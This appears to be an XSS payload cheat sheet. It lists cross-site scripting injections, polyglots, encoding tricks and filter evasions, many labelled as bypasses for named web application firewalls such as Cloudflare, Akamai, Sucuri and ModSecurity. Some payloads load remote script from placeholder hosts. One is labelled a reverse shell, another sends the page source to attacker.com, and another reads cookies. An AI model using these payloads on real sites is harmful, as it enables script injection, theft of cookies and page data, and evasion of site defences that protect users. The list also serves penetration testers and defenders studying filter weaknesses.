jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
Hi'&gt;"<script src="//xss-server"></script><x="{9*9}\r\n%0a%09%0d<svg\onload=confirm(1)>
<x/onclick=alert``>
"><img src onerror=alert(1)>
<--`<img/src=` onerror=alert(3)> --!>
" autofocus onfocus=alert(4) fragment="
" onclick=alert`5` fragment="
<details/open ontoggle=alert(6)>
<svg/onload=alert`7`>
><svg/onload=confirm``>"@yahoo.com
</div><img/**/src/**/onerror=alert(1)>
<Svg%K9OnLoad=%7Krompt%6K1%6K>
"'`><svg/onload=alert`1234`>

𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],
𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]
+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]
+𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()


<script>setInterval(function(){d=document;z=d.createElement("script");z.src="//IP:PORT";d.body.appendChild(z)},0)</script>  ==> reverse Shell
<iframe/src=j%0aa%0av%0aa%0as%0ac%0ar%0ai%0ap%0t:prompt `1`> --> test it
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> --> ModSecurity bypass

javascript:alert(1)
'-alert(1)-'
'-alert(1)//
`-alert(1)//\
\'-alert(1)//
'}alert(1);{'
'}alert(1)%0A{'
\'}alert(1);{//
\u0027-confirm`1`-\u0027 
"; ||confirm('XSS') || "
'*prompt(1)*'
${alert(1)}
{{32*32}}


""});});});alert(1);$('a').each(function(i){$(this).click(function(event){x({y
"])},alert(1));(function xss() {//
'?prompt`1`?'
" onmouseover=alert(/@darknetguy/)
" onclick=alert(1)//">click
" autofocus onfocus=alert(1) "
" onfocus=prompt(1) autofocus fragment="
" onfocus=prompt(1) onmouseover="confirm(1) " style="position:absolute;width:100%;height:100%;top:0;left:0;"
" onmousemove=alert(/@darknetguy/)//">Milad

"><svg onload=alert(1)>.gif
http://www.<svg/onload=ConFirm`1`>.com
"><svg/onload=confirm(1)>"@yahoo.com

<form action=javascript:alert(1)//
<form><button formaction=javascript&colon;alert(1)>xss
<form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>
<form id="test" /><button form="test" formaction="javascript:alert()">xss

<object data="data:text/html,<script>alert(5)</script>">
<iframe srcdoc="<svg onload=alert(4);>">
<object data=javascript:alert(3)>
<iframe src=javascript:alert(2)>
<embed src=javascript:alert(1)>

<iframe src='jAvAsCripT:(alert)()'></iframe>
<script%20~~~>\u0061\u006C\u0065\u0072\u0074``</script%20~~~>
<?tag x="-->" test="<img src=x onerror=alert(1)//">

bypass alert filter:
(alert)(1)
a=alert,a(2)
[3].find(alert)
al\u0065rt(4)
alert`5`
[6].map(alert)
[7].every(alert)
[8].filter(alert)
[9].findIndex(alert)
[10].forEach(alert)
self['alert'](11)
parent['alert'](12)
window['alert'](13)


Wordfence 7.4.2
<a href=&#01javascript:alert(1)>

Sucuri CloudProxy (POST only)
<a href=javascript&colon;confirm(1)>

ModSecurity CRS 3.2.0 PL1
<a href="jav%0Dascript&colon;alert(1)">



<iframe/onload="var b = 'document.domain)'; var a = 'JaV' + 'ascRipt:al' + 'ert(' + b; this['src']=a">
<script>eval(location.hash.slice(2))</script>    and end of url ==> #alert("testtesttestets")

<script>
x='<%'
</script> %>/
alert(2)
</script>

/<img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert`1`;> ---> cloudflare {`XSS´} «byPASS»
/<svg%0Aonauxclick=0;[1].some(confirm)//



<svg/onload="(new Image()).src='//attacker.com/'%2Bdocument.documentElement.innerHTML">   ===> send current page's source to attacker site


  ===> use < diffrent way


">'><details/open/ontoggle=confirm('XSS')>   ===> maybe WAF bypasser (Test it)


<object/data="javascript&colon;alert/**/(document.domain)">//   ===>  Bypass CloudFront WAF

%3c<aa+ONLOAD+href=javasONLOADcript:promptONLOAD(1)%3e ===> maybe WAF bypasser (Test it)

<iframe src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(0)">   ===>  maybe WAF bypasser (Test it)

"><input/onauxclick="[1].map(prompt)">   ==> Sucuri WAF XSS bypass 

<--`<img%2fsrc%3d` onerror%3dalert(document.domain)> --!>    ===> CloudFront XSS bypass

1'"><img/src/onerror=.1|alert``>   ===>  Cloudflare #XSS #Bypass via dot
<img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert`1`;>
<select><noembed></select><script x=’a@b’a>y=’a@b’//a@b%0a\u0061lert(1)</script x>
<a+HREF=’%26%237javascrip%26%239t:alert%26lpar;document.domain)’>

<!--><svg onload=alert(1)-->    ===> bypass if comments are allowed
<svg onload="alert(1)" <="" svg=""
<svg onload=alert(1)//

<sVg/oNloAd=”JaVaScRiPt:/**\/*\’/”\eval(atob(‘Y29uZmlybShkb2N1bWVudC5kb21haW4pOw==’))”>
<iframe src=jaVaScrIpT:eval(atob(‘Y29uZmlybShkb2N1bWVudC5kb21haW4pOw==’))>


** 𝗔𝗸𝗮𝗺𝗮𝗶 [𝗞𝗢𝗡𝗔 𝗦𝗶𝘁𝗲 𝗗𝗲𝗳𝗲𝗻𝗱𝗲𝗿] 𝗪𝗔𝗙 𝗕𝘆𝗽𝗮𝘀𝘀 **
<tiger/onpointerrawupdate=this['innerHTML']=unescape(location.hash);>XSS Me#<img src=x onerror=alert(0)>


<a href=”j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;\u0061\u006C\u0065\u0072\u0074&lpar;this[‘document’][‘cookie’]&rpar;”>X</a>  ==> Cloudflare Bypass 

javascript:”/*’/*`/* →<html \” onmouseover=/*&lt;svg/*/onload=alert()//> 

<marquee+loop=1+width=0+onfinish='new+Function`al\ert\`1\``'>    ===> Akamai waf bypass

</script><svg><script>alert(1)%0A-->   ===> It must land where JS syntax is not affected though
<link rel=import href='.&#47"><svg%20onload=alert(domain)>'>
<iframe src="javascript:alert(1)%%0D3C!--
<iframe src="javascript:alert(1)%%0D3C--

"><block%quote oncontextmenu%3Dconfirm(1)>Right click me</blockquote><!--
<--` <body/onload=&lt;!--&gt;&#10alert(1)> --!>
i\{\<\/\s\t\y\le\>\<\i\m\g\20\o\ne\r\r\o\r\=\'a\le\r\t\(\1\)\'\s\rc\=\'e\'\20\>{
<script src=data:,alert(1)>
https://brutelogic.com.br/xss.php/"><svg onload=alert(1)>?a=reader
x”</title><img src%3dx onerror%3dalert(1)>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
<dETAILS%0Aopen%0AonToGgle%0A=%0Aa=prompt,a() x>
<svg onunload=http://window.open('javascript:alert(1)')>


XSS'\x22"%22>4<%\u0022/* ===> locator!

<ScRiPt src=https://yoursite.com/XSS.js>

<style/onload=alert(0)>

%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(0)  ==> injecting into src attributes, you need a javascript URI payload

  ===>  AWS WAF bypass

{` <body \< onscroll =1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> ´}  ==> cloudflare «XSS» payload to bypass protection

IE weird behavior:
<iframe id=element></iframe>
<script>
element.alert(1)
</script>

parentheses free payload by @aemkei
<script>
onload=setTimeout
Event.prototype.toString=
_=>"alert\501\51"
</script>


<</div>script</div>>alert()<</div>/script</div>>

<</div> %3c script</div>>alert()<<</div>/script</div>

</ScRiPt><img src=something onauxclick="new Function `al\ert\`xss\``">
#Akamai #Bypass #XSS #BugBounty
Found a working #xss payload after a brainstorming for a long #time. 
#Tested in many sites with alexa ranking below #1000

Cloudflare WAF working again...
Dec: <svg onload=prompt%26%230000000040document.domain)>
Hex: <svg onload=prompt%26%23x000000028;document.domain)>


One to bypass Cloudflare WAF by @JacksonHHax
 <svg onload=alert%26%230000000040"1")>



<
%3C
&lt
&lt;
&LT
&LT;
&#60
&#060
&#0060
&#00060
&#000060
&#0000060
&#60;
&#060;
&#0060;
&#00060;
&#000060;
&#0000060;
&#x3c
&#x03c
&#x003c
&#x0003c
&#x00003c
&#x000003c
&#x3c;
&#x03c;
&#x003c;
&#x0003c;
&#x00003c;
&#x000003c;
&#X3c
&#X03c
&#X003c
&#X0003c
&#X00003c
&#X000003c
&#X3c;
&#X03c;
&#X003c;
&#X0003c;
&#X00003c;
&#X000003c;
&#x3C
&#x03C
&#x003C
&#x0003C
&#x00003C
&#x000003C
&#x3C;
&#x03C;
&#x003C;
&#x0003C;
&#x00003C;
&#x000003C;
&#X3C
&#X03C
&#X003C
&#X0003C
&#X00003C
&#X000003C
&#X3C;
&#X03C;
&#X003C;
&#X0003C;
&#X00003C;
&#X000003C;
\x3c
\x3C
\u003c
\u003C